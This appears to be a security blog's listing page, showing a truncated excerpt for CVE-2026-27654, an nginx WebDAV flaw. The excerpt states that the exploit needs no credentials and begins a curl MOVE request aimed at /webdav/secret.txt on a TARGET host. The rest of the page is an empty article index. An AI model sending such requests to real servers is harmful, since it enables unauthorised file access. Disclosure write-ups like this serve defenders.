Articles

§06 · Field notes

CVE · PLUGINS · ZERO-DAYS

GitHub

Jun 4, 2026 · CVE-2026-27654

CVE-2026-27654: nginx-dav-cve-2026-27654

## The Exploit Requires only network access to a DAV-enabled aliased prefix location; no privileged credentials are needed if the `MOVE`/`COPY` endpoint is exposed. ```bash curl -i -s -X MOVE 'http://TARGET/webdav/secret.txt' \ -H 'Host: TARGET' \ -H 'Destination: http://TA...

nginx-dav-cve-2026-27654

1 min read · 0 findings

Read →

latest · 0 of 73

All 73 WordPress Plugins 0 GitHub 73 Folder 0

No articles yet in this category.